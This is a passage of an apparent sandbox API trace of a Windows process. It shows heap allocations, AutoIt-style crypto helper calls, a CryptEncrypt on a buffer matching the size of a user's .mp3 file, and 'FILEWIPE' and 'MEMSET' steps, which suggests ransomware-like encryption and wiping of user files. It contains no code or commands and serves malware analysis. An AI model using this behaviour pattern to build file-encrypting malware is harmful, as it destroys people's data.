[0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.905] CharLowerBuffW (in: lpsz="byte[3793]", cchLength=0xa | out: lpsz="byte[3793]") returned 0xa [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0037.905] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.906] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.906] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.906] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.906] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0037.906] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0037.906] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0037.907] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xac1da8*, pdwDataLen=0x6ae220*=0xec0, dwBufLen=0xed0 | out: pbData=0xac1da8*, pdwDataLen=0x6ae220*=0xed0) returned 1 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b70 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.907] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.907] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0037.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.908] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0037.908] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.908] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.908] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.908] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.908] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.908] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.908] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.908] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.908] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.908] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.908] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.908] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.908] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.908] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.909] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.909] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.909] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0037.909] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.909] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.909] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0037.909] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.909] CryptDestroyKey (hKey=0x7c2280) returned 1 [0037.909] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.909] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.910] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0037.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.910] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.910] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.910] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.910] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0037.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0037.910] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.910] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.910] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0037.910] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0037.910] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0037.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.910] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.910] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.910] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0037.911] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.911] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0037.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0037.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.911] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.911] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0037.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.911] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.911] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.911] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.911] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.911] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.911] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.911] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.911] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.911] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0037.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0037.911] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0037.912] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.912] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.912] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0037.912] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.912] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0037.912] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0037.912] FreeLibrary (hLibModule=0x754b0000) returned 1 [0037.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0037.912] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0037.912] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.912] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.912] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.913] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.913] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.913] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.913] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0037.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.913] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0037.913] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.913] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.914] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\f5eSIWN.mp3", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59695b30, ftCreationTime.dwHighDateTime=0x1d5c240, ftLastAccessTime.dwLowDateTime=0x9c1fc00, ftLastAccessTime.dwHighDateTime=0x1d5b6c8, ftLastWriteTime.dwLowDateTime=0x9c1fc00, ftLastWriteTime.dwHighDateTime=0x1d5b6c8, nFileSizeHigh=0x0, nFileSizeLow=0xec0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="f5eSIWN.mp3", cAlternateFileName="")) returned 0x7c2100 [0037.914] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0037.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0037.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.914] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.914] CharLowerBuffW (in: lpsz="byte[3776]", cchLength=0xa | out: lpsz="byte[3776]") returned 0xa [0037.914] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.914] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0037.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.914] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.914] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.914] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0037.915] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0037.915] FreeLibrary (hLibModule=0x76b40000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0037.915] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: 